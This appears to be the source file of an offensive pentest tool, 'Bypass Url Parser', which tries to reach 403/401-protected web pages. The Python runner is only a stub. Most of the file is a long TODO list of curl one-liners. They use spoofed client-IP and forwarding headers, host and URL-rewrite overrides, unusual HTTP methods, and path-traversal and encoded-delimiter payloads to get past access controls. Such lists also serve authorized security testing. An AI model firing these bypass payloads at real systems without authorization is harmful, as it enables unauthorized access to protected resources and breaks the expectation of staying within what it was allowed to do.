#!/usr/bin/env python3
"""Bypass Url Parser, made with love by @TheLaluka
A tool that tests MANY url bypasses to reach a 40X protected page.

Usage:
    ./bypass-url-parser.py --url=<URL> [--outdir=<OUTDIR>] [--debug]
    ./bypass-url-parser.py (-h | --help)
    ./bypass-url-parser.py (-v | --version)

Options:
    -h --help            Show help, you are here :)
    -v --version         Show version info.
    --url=<URL>          URL (path is optional) to run bypasses against.
    --outdir=<outdir>    Output directory for results.
    --debug              Enable debugging output, to... Tou know... Debug.

Example:
    ./bypass-url-parser.py --url http://127.0.0.1/juicy_403_endpoint/
"""

from docopt import docopt
from pathlib import Path
from rich import print
import coloredlogs
import logging
import subprocess
import sys
import tempfile
import urllib

VERSION = "0.1.0"
logger = logging.getLogger("bup")
config = dict()


class Bypasser:
    def __init__(self, config):
        self.url = config.get("url")
        self.outdir = config.get("outdir")
        self.debug = config.get("debug")

    def __str__(self):
        out = str()
        out += f"url: {self.url}"
        out += f"outdir: {self.outdir}"
        out += f"debug: {self.debug}"
        return out

    def generate_curls(self):
        logger.warning("Stage: generate_curls")
        return

    def run_curls(self):
        logger.warning("Stage: run_curls")
        # import ipdb; ipdb.set_trace()
        cmd = ["curl", "-sS", "-kg", "--path-as-is", "-o", "/tmp/out.log", "-w", "Status: %{http_code}, Length: %{size_download}", "-X", "GET", "-H", "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36", config["url"].geturl()]
        try:
            some_curl = subprocess.check_output(cmd, timeout=2).decode()
        except subprocess.CalledProcessError as e:
            logger.warn(f"command '{e.cmd}' returned on-zero error code {e.returncode}: {e.output}")
        except subprocess.TimeoutExpired as e:
            logger.warn(f"command '{e.cmd}' timed out: {e.output}")
        logger.info(some_curl)
        return

    def save_and_quit(self):
        logger.warning("Stage: save_and_quit")
        # path_routes = config["outdir"] + "/all-routes.json"
        # with open(path_routes, "w") as f:
        #     f.write(json.dumps(config["routes"], indent=4, sort_keys=True))
        # 
        # path_urls = config["outdir"] + "/all-urls.lst"
        # with open(path_urls, "w") as f:
        #     f.write("\n".join(sorted(set(config["final_urls"]))))
        # 
        # logger.info(f"Saving routes & urls in: \n{path_routes}\n{path_urls}")
        # logger.debug(config["final_urls"])
        return


def main():
    global config
    # Show all options by Default
    if len(sys.argv) == 1:
        sys.argv.append("-h")
    arguments = docopt(__doc__, version=f"bypass-url-parser {VERSION}")

    # debug
    config["debug"] = arguments.get("--debug")

    # Log level
    coloredlogs.install(
        logger=logger, level=logging.DEBUG if config["debug"] else logging.INFO
    )

    if config["debug"]:
        logger.debug(f"arguments: {arguments}")

    try:
        config["url"] = urllib.parse.urlparse(arguments.get("--url"))
    except Exception as e:
        logger.error(f"Couldn't parse url, found {arguments.get('--url')}")
        logger.error(e)
        exit(42)

    # outdir
    try:
        if not arguments.get("--outdir"):
            config["outdir"] = (f"{tempfile.TemporaryDirectory().name}-bypass-url-parser")
        else:
            config["outdir"] = arguments.get("--outdir")
        Path(config["outdir"]).mkdir(parents=True, exist_ok=True)
    except Exception as e:
        logger.error("Error while creating output directory")
        logger.error(e)
        exit(42)

    logger.info("=== Config ===")
    for key, val in config.items():
        logger.info(f"{key}: {val}")

    exporter = Bypasser(config)
    exporter.generate_curls()
    exporter.run_curls()
    exporter.save_and_quit()


if __name__ == "__main__":
    main()


"""
# TODO
curl -X GET "$URL"
curl -H "X-Originally-Forwarded-For: 127.0.0.1, 68.180.194.242" -X GET "$URL"
curl -H "X-Originating-: 127.0.0.1, 68.180.194.242" -X GET "$URL"
curl -H "X-Originating-IP: 127.0.0.1, 68.180.194.242" -X GET "$URL"
curl -H "True-Client-IP: 127.0.0.1, 68.180.194.242" -X GET "$URL"
curl -H "X-WAP-Profile: 127.0.0.1, 68.180.194.242" -X GET "$URL"
curl -H "X-WAP-Profile: 127.0.0.1, 68.180.194.242" -X GET "$URL"
curl -H "Profile: http://$VHOST" -X GET "$URL"
curl -H "X-Arbitrary: http://$VHOST" -X GET "$URL"
curl -H "X-HTTP-DestinationURL: http://$VHOST" -X GET "$URL"
curl -H "X-Forwarded-Proto: http://$VHOST" -X GET "$URL"
curl -H "Destination: 127.0.0.1, 68.180.194.242" -X GET "$URL"
curl -H "Proxy: 127.0.0.1, 68.180.194.242" -X GET "$URL"
curl -H "CF-Connecting_IP: 127.0.0.1, 68.180.194.242" -X GET "$URL"
curl -H "CF-Connecting-IP: 127.0.0.1, 68.180.194.242" -X GET "$URL"
curl -H "Referer: $URL" -X GET "$URL"
curl -H "X-Custom-IP-Authorization: 127.0.0.1" -X GET "$URL"
curl -H "X-Custom-IP-Authorization: 127.0.0.1" -X GET "$URL..;/"
curl -H "X-Originating-IP: 127.0.0.1" -X GET "$URL"
curl -H "X-Forwarded-For: 127.0.0.1" -X GET "$URL"
curl -H "X-Remote-IP: 127.0.0.1" -X GET "$URL"
curl -H "X-Client-IP: 127.0.0.1" -X GET "$URL"
curl -H "X-Host: 127.0.0.1" -X GET "$URL"
curl -H "X-Forwarded-Host: 127.0.0.1" -X GET "$URL"
curl -H "X-Original-URL: /$PAT" -X GET "$URL/anything"
curl -H "X-Rewrite-URL: /$PAT" -X GET "$URL"
curl -H "Content-Length: 0" -X GET "$URL"
curl -H "X-ProxyUser-Ip: 127.0.0.1" -X GET "$URL"
curl -H "Base-Url: 127.0.0.1" -X GET "$URL"
curl -H "Client-IP: 127.0.0.1" -X GET "$URL"
curl -H "Http-Url: 127.0.0.1" -X GET "$URL"
curl -H "Proxy-Host: 127.0.0.1" -X GET "$URL"
curl -H "Proxy-Url: 127.0.0.1" -X GET "$URL"
curl -H "Real-Ip: 127.0.0.1" -X GET "$URL"
curl -H "Redirect: 127.0.0.1" -X GET "$URL"
curl -H "Referrer: 127.0.0.1" -X GET "$URL"
curl -H "Request-Uri: 127.0.0.1" -X GET "$URL"
curl -H "Uri: 127.0.0.1" -X GET "$URL"
curl -H "Url: 127.0.0.1" -X GET "$URL"
curl -H "X-Forward-For: 127.0.0.1" -X GET "$URL"
curl -H "X-Forwarded-By: 127.0.0.1" -X GET "$URL"
curl -H "X-Forwarded-For-Original: 127.0.0.1" -X GET "$URL"
curl -H "X-Forwarded-Server: 127.0.0.1" -X GET "$URL"
curl -H "X-Forwarded: 127.0.0.1" -X GET "$URL"
curl -H "X-Forwarder-For: 127.0.0.1" -X GET "$URL"
curl -H "X-Http-Destinationurl: 127.0.0.1" -X GET "$URL"
curl -H "X-Http-Host-Override: 127.0.0.1" -X GET "$URL"
curl -H "X-Original-Remote-Addr: 127.0.0.1" -X GET "$URL"
curl -H "X-Proxy-Url: 127.0.0.1" -X GET "$URL"
curl -H "X-Real-Ip: 127.0.0.1" -X GET "$URL"
curl -H "X-Remote-Addr: 127.0.0.1" -X GET "$URL"
curl -H "Host: " -X GET "$URL"
curl -H "Host: localhost" -X GET "$URL"
curl -H "Host: 127.0.0.1" -X GET "$URL"
curl -H "Host: 0.0.0.0" -X GET "$URL"
curl -H "X-OReferrer: https%3A%2F%2Fwww.google.com%2F" -X GET "$URL"
curl -X GET "http://$VHOST/$PAT"
curl -X GET "https://$VHOST/$PAT"
curl -H "X-Forwarded-Scheme: http" -X GET "$URL"
curl -H "X-Forwarded-Scheme: https" -X GET "$URL"
curl -H "X-Forwarded-Port: 443" -X GET "$URL"
curl -H "X-Forwarded-Port: 4443" -X GET "$URL"
curl -H "X-Forwarded-Port: 80" -X GET "$URL"
curl -H "X-Forwarded-Port: 8080" -X GET "$URL"
curl -H "X-Forwarded-Port: 8443" -X GET "$URL"
curl "$URL" -L -X GET
curl "$URL" -L -X POST
curl "$URL" -L -I
curl "$URL" -L -X OPTIONS
curl "$URL" -L -X PUT
curl "$URL" -L -X TRACE
curl "$URL" -L -X PATCH
curl "$URL" -L -X TRACK
curl "$URL" -L -X CONNECT
curl "$URL" -L -X UPDATE
curl "$URL" -L -X LOCK
curl "$URL#?"
curl "$URL%09"
curl "$URL%09%3b"
curl "$URL%09.."
curl "$URL%09;"
curl "$URL%20"
curl "$URL%23%3f"
curl "$URL%252f%252f"
curl "$URL%252f/"
curl "$URL%2e%2e"
curl "$URL%2e%2e/"
curl "$URL%2f"
curl "$URL%2f%20%23"
curl "$URL%2f%23"
curl "$URL%2f%2f"
curl "$URL%2f%3b%2f"
curl "$URL%2f%3b%2f%2f"
curl "$URL%2f%3f"
curl "$URL%2f%3f/"
curl "$URL%2f/"
curl "$URL%3b"
curl "$URL%3b%09"
curl "$URL%3b%2f%2e%2e"
curl "$URL%3b%2f%2e%2e%2f%2e%2e%2f%2f"
curl "$URL%3b%2f%2e."
curl "$URL%3b%2f.."
curl "$URL%3b/%2e%2e/..%2f%2f"
curl "$URL%3b/%2e."
curl "$URL%3b/%2f%2f../"
curl "$URL%3b/.."
curl "$URL%3b//%2f../"
curl "$URL%3f%23"
curl "$URL%3f%3f"
curl "$URL.."
curl "$URL..%00/;"
curl "$URL..%00;/"
curl "$URL..%09"
curl "$URL..%0d/;"
curl "$URL..%0d;/"
curl "$URL..%5c/"
curl "$URL..%ff/;"
curl "$URL..%ff;/"
curl "$URL..;%00/"
curl "$URL..;%0d/"
curl "$URL..;%ff/"
curl "$URL..;\\"
curl "$URL..;\;"
curl "$URL..\;"
curl "$URL/%20#"
curl "$URL/%20%23"
curl "$URL/%252e%252e%252f/"
curl "$URL/%252e%252e%253b/"
curl "$URL/%252e%252f/"
curl "$URL/%252e%253b/"
curl "$URL/%252e/"
curl "$URL/%252f"
curl "$URL/%2e%2e"
curl "$URL/%2e%2e%3b/"
curl "$URL/%2e%2e/"
curl "$URL/%2e%2f/"
curl "$URL/%2e%3b/"
curl "$URL/%2e%3b//"
curl "$URL/%2e/"
curl "$URL/%2e//"
curl "$URL/%2f"
curl "$URL/%3b/"
curl "$URL/.."
curl "$URL/..%2f"
curl "$URL/..%2f..%2f"
curl "$URL/..%2f..%2f..%2f"
curl "$URL/../"
curl "$URL/../../"
curl "$URL/../../../"
curl "$URL/../../..//"
curl "$URL/../..//"
curl "$URL/../..//../"
curl "$URL/../..;/"
curl "$URL/.././../"
curl "$URL/../.;/../"
curl "$URL/..//"
curl "$URL/..//../"
curl "$URL/..//../../"
curl "$URL/..//..;/"
curl "$URL/../;/"
curl "$URL/../;/../"
curl "$URL/..;%2f"
curl "$URL/..;%2f..;%2f"
curl "$URL/..;%2f..;%2f..;%2f"
curl "$URL/..;/../"
curl "$URL/..;/..;/"
curl "$URL/..;//"
curl "$URL/..;//../"
curl "$URL/..;//..;/"
curl "$URL/..;/;/"
curl "$URL/..;/;/..;/"
curl "$URL/.//"
curl "$URL/.;/"
curl "$URL/.;//"
curl "$URL//.."
curl "$URL//../../"
curl "$URL//..;"
curl "$URL//./"
curl "$URL//.;/"
curl "$URL///.."
curl "$URL///../"
curl "$URL///..//"
curl "$URL///..;"
curl "$URL///..;/"
curl "$URL///..;//"
curl "$URL//;/"
curl "$URL/;/"
curl "$URL/;//"
curl "$URL/;x"
curl "$URL/;x/"
curl "$URL/x/../"
curl "$URL/x/..//"
curl "$URL/x/../;/"
curl "$URL/x/..;/"
curl "$URL/x/..;//"
curl "$URL/x/..;/;/"
curl "$URL/x//../"
curl "$URL/x//..;/"
curl "$URL/x/;/../"
curl "$URL/x/;/..;/"
curl "$URL;"
curl "$URL;%09"
curl "$URL;%09.."
curl "$URL;%09..;"
curl "$URL;%09;"
curl "$URL;%2F.."
curl "$URL;%2f%2e%2e"
curl "$URL;%2f%2e%2e%2f%2e%2e%2f%2f"
curl "$URL;%2f%2f/../"
curl "$URL;%2f.."
curl "$URL;%2f..%2f%2e%2e%2f%2f"
curl "$URL;%2f..%2f..%2f%2f"
curl "$URL;%2f..%2f/"
curl "$URL;%2f..%2f/..%2f"
curl "$URL;%2f..%2f/../"
curl "$URL;%2f../%2f..%2f"
curl "$URL;%2f../%2f../"
curl "$URL;%2f..//..%2f"
curl "$URL;%2f..//../"
curl "$URL;%2f..///"
curl "$URL;%2f..///;"
curl "$URL;%2f..//;/"
curl "$URL;%2f..//;/;"
curl "$URL;%2f../;//"
curl "$URL;%2f../;/;/"
curl "$URL;%2f../;/;/;"
curl "$URL;%2f..;///"
curl "$URL;%2f..;//;/"
curl "$URL;%2f..;/;//"
curl "$URL;%2f/%2f../"
curl "$URL;%2f//..%2f"
curl "$URL;%2f//../"
curl "$URL;%2f//..;/"
curl "$URL;%2f/;/../"
curl "$URL;%2f/;/..;/"
curl "$URL;%2f;//../"
curl "$URL;%2f;/;/..;/"
curl "$URL;/%2e%2e"
curl "$URL;/%2e%2e%2f%2f"
curl "$URL;/%2e%2e%2f/"
curl "$URL;/%2e%2e/"
curl "$URL;/%2e."
curl "$URL;/%2f%2f../"
curl "$URL;/%2f/..%2f"
curl "$URL;/%2f/../"
curl "$URL;/.%2e"
curl "$URL;/.%2e/%2e%2e/%2f"
curl "$URL;/.."
curl "$URL;/..%2f"
curl "$URL;/..%2f%2f../"
curl "$URL;/..%2f..%2f"
curl "$URL;/..%2f/"
curl "$URL;/..%2f//"
curl "$URL;/../"
curl "$URL;/../%2f/"
curl "$URL;/../../"
curl "$URL;/../..//"
curl "$URL;/.././../"
curl "$URL;/../.;/../"
curl "$URL;/..//"
curl "$URL;/..//%2e%2e/"
curl "$URL;/..//%2f"
curl "$URL;/..//../"
curl "$URL;/..///"
curl "$URL;/../;/"
curl "$URL;/../;/../"
curl "$URL;/..;"
curl "$URL;/.;."
curl "$URL;//%2f../"
curl "$URL;//.."
curl "$URL;//../../"
curl "$URL;///.."
curl "$URL;///../"
curl "$URL;///..//"
curl "$URL;x"
curl "$URL;x/"
curl "$URL;x;"
curl "$URL&"
curl "$URL%"
curl "$URL%09"
curl "$URL../"
curl "$URL..%2f"
curl "$URL.././"
curl "$URL..%00/"
curl "$URL..%0d/"
curl "$URL..%5c"
curl "$URL..\\"
curl "$URL..%ff"
curl "$URL%2e%2e%2f"
curl "$URL.%2e/"
curl "$URL%3f"
curl "$URL%26"
curl "$URL%23"
curl "$URL%2e"
curl "$URL/."
curl "$URL?"
curl "$URL??"
curl "$URL???"
curl "$URL//"
curl "$URL/./"
curl "$URL.//./"
curl "$URL//?anything"
curl "$URL#"
curl "$URL/"
curl "$URL/.randomstring"
curl "$URL..;/"
curl "$URL.html"
curl "$URL%20/"
curl "$URL/%20$PAT%20/"
curl "$URL.json"
curl "$URL\..\.\\"
curl "$URL/*"
curl "$URL./."
curl "$URL/*/"
curl "$URL/..;/"
curl "$URL/%2e/$PAT"
curl "$URL/%2e/"
curl "$URL//."
curl "$URL////"
curl "$URL/../"
curl "$URL/;$PAT/"
curl "$SCHEME://$VHOST/%3F$PAT"
curl "$SCHEME://$VHOST/%09$PAT"
curl "$SCHEME://$VHOST/%09%3b$PAT"
curl "$SCHEME://$VHOST/%09..$PAT"
curl "$SCHEME://$VHOST/%09;$PAT"
curl "$SCHEME://$VHOST/%20$PAT"
curl "$SCHEME://$VHOST/%23%3f$PAT"
curl "$SCHEME://$VHOST/%252f%252f$PAT"
curl "$SCHEME://$VHOST/%252f/$PAT"
curl "$SCHEME://$VHOST/%2e%2e$PAT"
curl "$SCHEME://$VHOST/%2e%2e/$PAT"
curl "$SCHEME://$VHOST/%2f$PAT"
curl "$SCHEME://$VHOST/%2f%20%23$PAT"
curl "$SCHEME://$VHOST/%2f%23$PAT"
curl "$SCHEME://$VHOST/%2f%2f$PAT"
curl "$SCHEME://$VHOST/%2f%3b%2f$PAT"
curl "$SCHEME://$VHOST/%2f%3b%2f%2f$PAT"
curl "$SCHEME://$VHOST/%2f%3f$PAT"
curl "$SCHEME://$VHOST/%2f%3f/$PAT"
curl "$SCHEME://$VHOST/%2f/$PAT"
curl "$SCHEME://$VHOST/%3b$PAT"
curl "$SCHEME://$VHOST/%3b%09$PAT"
curl "$SCHEME://$VHOST/%3b%2f%2e%2e$PAT"
curl "$SCHEME://$VHOST/%3b%2f%2e%2e%2f%2e%2e%2f%2f$PAT"
curl "$SCHEME://$VHOST/%3b%2f%2e.$PAT"
curl "$SCHEME://$VHOST/%3b%2f..$PAT"
curl "$SCHEME://$VHOST/%3b/%2e%2e/..%2f%2f$PAT"
curl "$SCHEME://$VHOST/%3b/%2e.$PAT"
curl "$SCHEME://$VHOST/%3b/%2f%2f../$PAT"
curl "$SCHEME://$VHOST/%3b/..$PAT"
curl "$SCHEME://$VHOST/%3b//%2f../$PAT"
curl "$SCHEME://$VHOST/%3f%23$PAT"
curl "$SCHEME://$VHOST/%3f%3f$PAT"
curl "$SCHEME://$VHOST/..$PAT"
curl "$SCHEME://$VHOST/..%00/$PAT;"
curl "$SCHEME://$VHOST/..%00;/$PAT"
curl "$SCHEME://$VHOST/..%09$PAT"
curl "$SCHEME://$VHOST/..%0d/;$PAT"
curl "$SCHEME://$VHOST/..%0d;/$PAT"
curl "$SCHEME://$VHOST/..%5c/$PAT"
curl "$SCHEME://$VHOST/..%ff/;$PAT"
curl "$SCHEME://$VHOST/..%ff;/$PAT"
curl "$SCHEME://$VHOST/..;%00/$PAT"
curl "$SCHEME://$VHOST/..;%0d/$PAT"
curl "$SCHEME://$VHOST/..;%ff/$PAT"
curl "$SCHEME://$VHOST/..;\\$PAT"
curl "$SCHEME://$VHOST/..;\;$PAT"
curl "$SCHEME://$VHOST/..\;$PAT"
curl "$SCHEME://$VHOST//%20$PAT#"
curl "$SCHEME://$VHOST//%20%23$PAT"
curl "$SCHEME://$VHOST//%252e%252e%252f/$PAT"
curl "$SCHEME://$VHOST//%252e%252e%253b/$PAT"
curl "$SCHEME://$VHOST//%252e%252f/$PAT"
curl "$SCHEME://$VHOST//%252e%253b/$PAT"
curl "$SCHEME://$VHOST//%252e/$PAT"
curl "$SCHEME://$VHOST//%252f$PAT"
curl "$SCHEME://$VHOST//%2e%2e$PAT"
curl "$SCHEME://$VHOST//%2e%2e%3b/$PAT"
curl "$SCHEME://$VHOST//%2e%2e/$PAT"
curl "$SCHEME://$VHOST//%2e%2f/$PAT"
curl "$SCHEME://$VHOST//%2e%3b/$PAT"
curl "$SCHEME://$VHOST//%2e%3b//$PAT"
curl "$SCHEME://$VHOST//%2e/$PAT"
curl "$SCHEME://$VHOST//%2e//$PAT"
curl "$SCHEME://$VHOST//%2f$PAT"
curl "$SCHEME://$VHOST//%3b/$PAT"
curl "$SCHEME://$VHOST//..$PAT"
curl "$SCHEME://$VHOST//..%2f$PAT"
curl "$SCHEME://$VHOST//..%2f..%2f$PAT"
curl "$SCHEME://$VHOST//..%2f..%2f..%2f$PAT"
curl "$SCHEME://$VHOST//../$PAT"
curl "$SCHEME://$VHOST//../../$PAT"
curl "$SCHEME://$VHOST//../../../$PAT"
curl "$SCHEME://$VHOST//../../..//$PAT"
curl "$SCHEME://$VHOST//../..//$PAT"
curl "$SCHEME://$VHOST//../..//../$PAT"
curl "$SCHEME://$VHOST//../..;/$PAT"
curl "$SCHEME://$VHOST//.././../$PAT"
curl "$SCHEME://$VHOST//../.;/../$PAT"
curl "$SCHEME://$VHOST//..//$PAT"
curl "$SCHEME://$VHOST//..//../$PAT"
curl "$SCHEME://$VHOST//..//../../$PAT"
curl "$SCHEME://$VHOST//..//..;/$PAT"
curl "$SCHEME://$VHOST//../;/$PAT"
curl "$SCHEME://$VHOST//../;/../$PAT"
curl "$SCHEME://$VHOST//..;%2f$PAT"
curl "$SCHEME://$VHOST//..;%2f..;%2f$PAT"
curl "$SCHEME://$VHOST//..;%2f..;%2f..;%2f$PAT"
curl "$SCHEME://$VHOST//..;/../$PAT"
curl "$SCHEME://$VHOST//..;/..;/$PAT"
curl "$SCHEME://$VHOST//..;//$PAT"
curl "$SCHEME://$VHOST//..;//../$PAT"
curl "$SCHEME://$VHOST//..;//..;/$PAT"
curl "$SCHEME://$VHOST//..;/;/$PAT"
curl "$SCHEME://$VHOST//..;/;/..;/$PAT"
curl "$SCHEME://$VHOST//.//$PAT"
curl "$SCHEME://$VHOST//.;/$PAT"
curl "$SCHEME://$VHOST//.;//$PAT"
curl "$SCHEME://$VHOST///..$PAT"
curl "$SCHEME://$VHOST///../../$PAT"
curl "$SCHEME://$VHOST///..;$PAT"
curl "$SCHEME://$VHOST///./$PAT"
curl "$SCHEME://$VHOST///.;/$PAT"
curl "$SCHEME://$VHOST////..$PAT"
curl "$SCHEME://$VHOST////../$PAT"
curl "$SCHEME://$VHOST////..//$PAT"
curl "$SCHEME://$VHOST////..;$PAT"
curl "$SCHEME://$VHOST////..;/$PAT"
curl "$SCHEME://$VHOST////..;//$PAT"
curl "$SCHEME://$VHOST///;/$PAT"
curl "$SCHEME://$VHOST//;/$PAT"
curl "$SCHEME://$VHOST//;//$PAT"
curl "$SCHEME://$VHOST//;x$PAT"
curl "$SCHEME://$VHOST//;x/$PAT"
curl "$SCHEME://$VHOST//x/../$PAT"
curl "$SCHEME://$VHOST//x/..//$PAT"
curl "$SCHEME://$VHOST//x/../;/$PAT"
curl "$SCHEME://$VHOST//x/..;/$PAT"
curl "$SCHEME://$VHOST//x/..;//$PAT"
curl "$SCHEME://$VHOST//x/..;/;/$PAT"
curl "$SCHEME://$VHOST//x//../$PAT"
curl "$SCHEME://$VHOST//x//..;/$PAT"
curl "$SCHEME://$VHOST//x/;/../$PAT"
curl "$SCHEME://$VHOST//x/;/..;/$PAT"
curl "$SCHEME://$VHOST/;$PAT"
curl "$SCHEME://$VHOST/;%09$PAT"
curl "$SCHEME://$VHOST/;%09..$PAT"
curl "$SCHEME://$VHOST/;%09..;$PAT"
curl "$SCHEME://$VHOST/;%09;$PAT"
curl "$SCHEME://$VHOST/;%2F..$PAT"
curl "$SCHEME://$VHOST/;%2f%2e%2e$PAT"
curl "$SCHEME://$VHOST/;%2f%2e%2e%2f%2e%2e%2f%2f$PAT"
curl "$SCHEME://$VHOST/;%2f%2f/../$PAT"
curl "$SCHEME://$VHOST/;%2f..$PAT"
curl "$SCHEME://$VHOST/;%2f..%2f%2e%2e%2f%2f$PAT"
curl "$SCHEME://$VHOST/;%2f..%2f..%2f%2f$PAT"
curl "$SCHEME://$VHOST/;%2f..%2f/$PAT"
curl "$SCHEME://$VHOST/;%2f..%2f/..%2f$PAT"
curl "$SCHEME://$VHOST/;%2f..%2f/../$PAT"
curl "$SCHEME://$VHOST/;%2f../%2f..%2f$PAT"
curl "$SCHEME://$VHOST/;%2f../%2f../$PAT"
curl "$SCHEME://$VHOST/;%2f..//..%2f$PAT"
curl "$SCHEME://$VHOST/;%2f..//../$PAT"
curl "$SCHEME://$VHOST/;%2f..///$PAT"
curl "$SCHEME://$VHOST/;%2f..///;$PAT"
curl "$SCHEME://$VHOST/;%2f..//;/$PAT"
curl "$SCHEME://$VHOST/;%2f..//;/;$PAT"
curl "$SCHEME://$VHOST/;%2f../;//$PAT"
curl "$SCHEME://$VHOST/;%2f../;/;/$PAT"
curl "$SCHEME://$VHOST/;%2f../;/;/;$PAT"
curl "$SCHEME://$VHOST/;%2f..;///$PAT"
curl "$SCHEME://$VHOST/;%2f..;//;/$PAT"
curl "$SCHEME://$VHOST/;%2f..;/;//$PAT"
curl "$SCHEME://$VHOST/;%2f/%2f../$PAT"
curl "$SCHEME://$VHOST/;%2f//..%2f$PAT"
curl "$SCHEME://$VHOST/;%2f//../$PAT"
curl "$SCHEME://$VHOST/;%2f//..;/$PAT"
curl "$SCHEME://$VHOST/;%2f/;/../$PAT"
curl "$SCHEME://$VHOST/;%2f/;/..;/$PAT"
curl "$SCHEME://$VHOST/;%2f;//../$PAT"
curl "$SCHEME://$VHOST/;%2f;/;/..;/$PAT"
curl "$SCHEME://$VHOST/;/%2e%2e$PAT"
curl "$SCHEME://$VHOST/;/%2e%2e%2f%2f$PAT"
curl "$SCHEME://$VHOST/;/%2e%2e%2f/$PAT"
curl "$SCHEME://$VHOST/;/%2e%2e/$PAT"
curl "$SCHEME://$VHOST/;/%2e.$PAT"
curl "$SCHEME://$VHOST/;/%2f%2f../$PAT"
curl "$SCHEME://$VHOST/;/%2f/..%2f$PAT"
curl "$SCHEME://$VHOST/;/%2f/../$PAT"
curl "$SCHEME://$VHOST/;/.%2e$PAT"
curl "$SCHEME://$VHOST/;/.%2e/%2e%2e/%2f$PAT"
curl "$SCHEME://$VHOST/;/..$PAT"
curl "$SCHEME://$VHOST/;/..%2f$PAT"
curl "$SCHEME://$VHOST/;/..%2f%2f../$PAT"
curl "$SCHEME://$VHOST/;/..%2f..%2f$PAT"
curl "$SCHEME://$VHOST/;/..%2f/$PAT"
curl "$SCHEME://$VHOST/;/..%2f//$PAT"
curl "$SCHEME://$VHOST/;/../$PAT"
curl "$SCHEME://$VHOST/;/../%2f/$PAT"
curl "$SCHEME://$VHOST/;/../../$PAT"
curl "$SCHEME://$VHOST/;/../..//$PAT"
curl "$SCHEME://$VHOST/;/.././../$PAT"
curl "$SCHEME://$VHOST/;/../.;/../$PAT"
curl "$SCHEME://$VHOST/;/..//$PAT"
curl "$SCHEME://$VHOST/;/..//%2e%2e/$PAT"
curl "$SCHEME://$VHOST/;/..//%2f$PAT"
curl "$SCHEME://$VHOST/;/..//../$PAT"
curl "$SCHEME://$VHOST/;/..///$PAT"
curl "$SCHEME://$VHOST/;/../;/$PAT"
curl "$SCHEME://$VHOST/;/../;/../$PAT"
curl "$SCHEME://$VHOST/;/..;$PAT"
curl "$SCHEME://$VHOST/;/.;.$PAT"
curl "$SCHEME://$VHOST/;//%2f../$PAT"
curl "$SCHEME://$VHOST/;//..$PAT"
curl "$SCHEME://$VHOST/;//../../$PAT"
curl "$SCHEME://$VHOST/;///..$PAT"
curl "$SCHEME://$VHOST/;///../$PAT"
curl "$SCHEME://$VHOST/;///..//$PAT"
curl "$SCHEME://$VHOST/;x$PAT"
curl "$SCHEME://$VHOST/;x/$PAT"
curl "$SCHEME://$VHOST/;x;$PAT"
curl "$SCHEME://$VHOST/&$PAT"
curl "$SCHEME://$VHOST/%$PAT"
curl "$SCHEME://$VHOST/%09$PAT"
curl "$SCHEME://$VHOST/../$PAT"
curl "$SCHEME://$VHOST/..%2f$PAT"
curl "$SCHEME://$VHOST/.././$PAT"
curl "$SCHEME://$VHOST/..%00/$PAT"
curl "$SCHEME://$VHOST/..%0d/$PAT"
curl "$SCHEME://$VHOST/..%5c$PAT"
curl "$SCHEME://$VHOST/..\\$PAT"
curl "$SCHEME://$VHOST/..%ff$PAT"
curl "$SCHEME://$VHOST/%2e%2e%2f$PAT"
curl "$SCHEME://$VHOST/.%2e/$PAT"
curl "$SCHEME://$VHOST/%3f$PAT"
curl "$SCHEME://$VHOST/%26$PAT"
curl "$SCHEME://$VHOST/%23$PAT"
curl "$SCHEME://$VHOST/%2e$PAT"
curl "$SCHEME://$VHOST//.$PAT"
curl "$SCHEME://$VHOST/?$PAT"
curl "$SCHEME://$VHOST/??$PAT"
curl "$SCHEME://$VHOST/???$PAT"
curl "$SCHEME://$VHOST///$PAT"
curl "$SCHEME://$VHOST//./$PAT"
curl "$SCHEME://$VHOST/.//./$PAT"
curl "$SCHEME://$VHOST///?anything$PAT"
curl "$SCHEME://$VHOST/#$PAT"
curl "$SCHEME://$VHOST//$PAT"
curl "$SCHEME://$VHOST//.randomstring$PAT"
curl "$SCHEME://$VHOST/..;/$PAT"
curl "$SCHEME://$VHOST/.html$PAT"
curl "$SCHEME://$VHOST/%20/$PAT"
curl "$SCHEME://$VHOST//%20$PAT%20/$PAT"
curl "$SCHEME://$VHOST/.json$PAT"
curl "$SCHEME://$VHOST/\..\.\\$PAT"
curl "$SCHEME://$VHOST//*$PAT"
curl "$SCHEME://$VHOST/./.$PAT"
curl "$SCHEME://$VHOST//*/$PAT"
curl "$SCHEME://$VHOST//..;/$PAT"
curl "$SCHEME://$VHOST//%2e/$PAT"
curl "$SCHEME://$VHOST//%2e/$PAT"
curl "$SCHEME://$VHOST///.$PAT"
curl "$SCHEME://$VHOST/////$PAT"
curl "$SCHEME://$VHOST//../$PAT"
curl "$SCHEME://$VHOST//;$PAT/$PAT"
curl -H "Access-Control-Allow-Origin: 127.0.0.1" -X GET "$URL"
curl -H "Forwarded: 127.0.0.1" -X GET "$URL"
curl -H "Forwarded-For: 127.0.0.1" -X GET "$URL"
curl -H "Forwarded-For-IP: 127.0.0.1" -X GET "$URL"
curl -H "Origin: 127.0.0.1" -X GET "$URL"
curl -H "X-Custom-IP-Authorization: 127.0.0.1" -X GET "$URL"
curl -H "X-Forwarded: 127.0.0.1" -X GET "$URL"
"""